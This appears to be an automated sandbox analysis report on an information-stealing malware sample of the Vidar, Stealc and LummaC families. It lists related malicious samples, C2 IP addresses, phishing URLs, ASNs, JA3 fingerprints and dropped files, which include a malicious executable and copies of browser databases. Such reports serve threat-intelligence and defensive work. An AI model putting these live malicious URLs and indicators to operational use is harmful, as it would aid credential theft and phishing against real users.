                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • 45.132.206.251
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                • 45.132.206.251
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                • 45.132.206.251
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • 45.132.206.251
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • 45.132.206.251
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • 45.132.206.251
                                                                                                                                                                                                bg.microsoft.map.fastly.nethttps://docs.google.com/forms/d/e/1FAIpQLSd11N0abxlW-jWhsgCqQSv4dirOC7CnOJxj0NYrOSmFOvEaMg/viewform?usp=pp_urlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                payload.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                1 (2).cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                SC.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                Ton618.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                Ton618 (2).exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                https://drmerp.com/bWFpbEBrc2xhdy5jby51aw==&xBvSo7gjDRPy&hmr&x-ad-vt-unk&OC305935Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                2.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                http://arcor.cfdGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                steamcommunity.comfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                RD4ttmm3bO.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                v4yke52Xwu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                pkUVF88MvI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                pl4VFaWQr8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                5STdfnsEu5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                13Xdl6SYqQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                playd.healthnlife.pkfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 147.45.44.104

                                                                                                                                                                                                ASNs

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                FREE-NET-ASFREEnetEUfile.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                CLOUDFLARENETUSfile.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                LVcCI.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                http://Warehousingpro.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                QUOTATIONS#08670.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                                                                                                • 104.26.12.205
                                                                                                                                                                                                https://trello.com/c/HA4sCE32Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 104.18.36.155
                                                                                                                                                                                                https://drmerp.com/bWFpbEBrc2xhdy5jby51aw==&xBvSo7gjDRPy&hmr&x-ad-vt-unk&OC305935Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 104.18.95.41
                                                                                                                                                                                                phish_alert_sp2_2.0.0.0.emlGet hashmaliciousPhisherBrowse
                                                                                                                                                                                                • 104.22.72.81
                                                                                                                                                                                                http://arcor.cfdGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                                                Message_2484922.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                http://arcor.cfd#warszawa@psgaz.plGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                                                AKAMAI-ASUSphish_alert_sp2_2.0.0.0.emlGet hashmaliciousPhisherBrowse
                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                http://arcor.cfdGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 104.78.188.188
                                                                                                                                                                                                Message_2484922.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                https://terryatchison-my.sharepoint.com/:f:/g/personal/terry_terryatchison_com_au/ElPLLTBYg_xBi3psE6F6HW0BDiAPLHOUdwoTRpPTGgsocg?e=hlVHMOGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 23.38.98.96
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                RD4ttmm3bO.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                v4yke52Xwu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                pkUVF88MvI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                HETZNER-ASDEpayload.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 195.201.57.90
                                                                                                                                                                                                1 (2).cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 195.201.57.90
                                                                                                                                                                                                SC.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 195.201.57.90
                                                                                                                                                                                                2.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 195.201.57.90
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                                                                                                                                                                                • 116.203.0.21
                                                                                                                                                                                                dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                                                                                                                                                                                                • 116.203.0.21
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                oRdgOQMxjr.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                • 178.63.51.126

                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                hVLguQ1OyJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                RD4ttmm3bO.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                v4yke52Xwu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                pkUVF88MvI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                QT2Q1292300924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                pl4VFaWQr8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                DHL Receipt_AWB 9892671327.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                37f463bf4616ecd445d4a1937da06e19Layer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                Layer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                24100311.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                4bblnRvDdS.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 104.102.49.254

                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse

                                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                                    C:\ProgramData\CBFCFBFBFB.exe

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):540536
                                                                                                                                                                                                                    Entropy (8bit):7.7458511305233015
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:TP12qROL6BdHCinYPrcYVfplaR3eumU9bxsG6oDPZ:xXXPiinMIKlaROymxo7Z
                                                                                                                                                                                                                    MD5:49504D08DC10AECA7D36605D6A20BDE0
                                                                                                                                                                                                                    SHA1:BB6CBFC6EF07C8EE1F287F3BE5690D0FFA5AC9EA
                                                                                                                                                                                                                    SHA-256:A6B03FCC5F34E1A4546A92C1B6CCC6ED2DDC92965437D0BB64D4F0E515E22C0E
                                                                                                                                                                                                                    SHA-512:33B6B2AD17C160BF5543D95CB0D2C000FB0B89FDE8BC55DA8424FDEFFA3A4CCC3DE7185CE2E520C421624F714CCFCF83DB09469359F4D41F74B7C2E840C9CA2D
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$..`..`..`.....l...........u..R..r..R..t.....e..`..9..R.....Q..a..Qz.a..Q..a..Rich`..........PE..L......f...............'.....Z......ro............@..........................`............@.................................0m..<....0..................x)...@......xP...............................O..@...............4............................text............................... ..`.rdata..$...........................@..@.data................b..............@....rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\JJDBAEHIJKJK\BAECFC

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):9976
                                                                                                                                                                                                                    Entropy (8bit):5.499944288613473
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:NzKneRdpYbBp6znmUzaX/6aRMKWPzDNBw8DK9mSl:Nz5eUmUtgmrwbw0
                                                                                                                                                                                                                    MD5:42594FD09C4DF3B174CF5D59B1CAB13A
                                                                                                                                                                                                                    SHA1:1B78FEB748C36A592C468A76BB60E98187D7BE4A
                                                                                                                                                                                                                    SHA-256:F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
                                                                                                                                                                                                                    SHA-512:E2430AB14ADF2EF1CC2CB1F96DEADAFB3598B803A5E7724FDDB68ACF015D7E052291626A3D100FED902731DBFD10A9AE3387581AD2867F64D0B27E8D51B9069F
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696493966);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696493970);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                    C:\ProgramData\JJDBAEHIJKJK\BFCGDA

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                    Entropy (8bit):1.1209886597424439
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                                                                                                                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                                                                                                                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                                                                                                                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                                                                                                                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\JJDBAEHIJKJK\BGDGHJ

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\JJDBAEHIJKJK\DAAECA

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                    Entropy (8bit):0.8475592208333753
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                                                                                                                                                                                                                    MD5:BE99679A2B018331EACD3A1B680E3757
                                                                                                                                                                                                                    SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                                                                                                                                                                                                                    SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                                                                                                                                                                                                                    SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\JJDBAEHIJKJK\DBKKFC

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):5242880
                                                                                                                                                                                                                    Entropy (8bit):0.03708713717387235
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
                                                                                                                                                                                                                    MD5:85D6E1D7F82C11DAC40C95C06B7B5DC5
                                                                                                                                                                                                                    SHA1:96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
                                                                                                                                                                                                                    SHA-256:D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
                                                                                                                                                                                                                    SHA-512:5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\JJDBAEHIJKJK\DBKKFC-shm

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\JJDBAEHIJKJK\EBGDHJ

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):155648
                                                                                                                                                                                                                    Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                    MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                    SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                    SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                    SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\JJDBAEHIJKJK\FIDHIE

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                                                                    Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

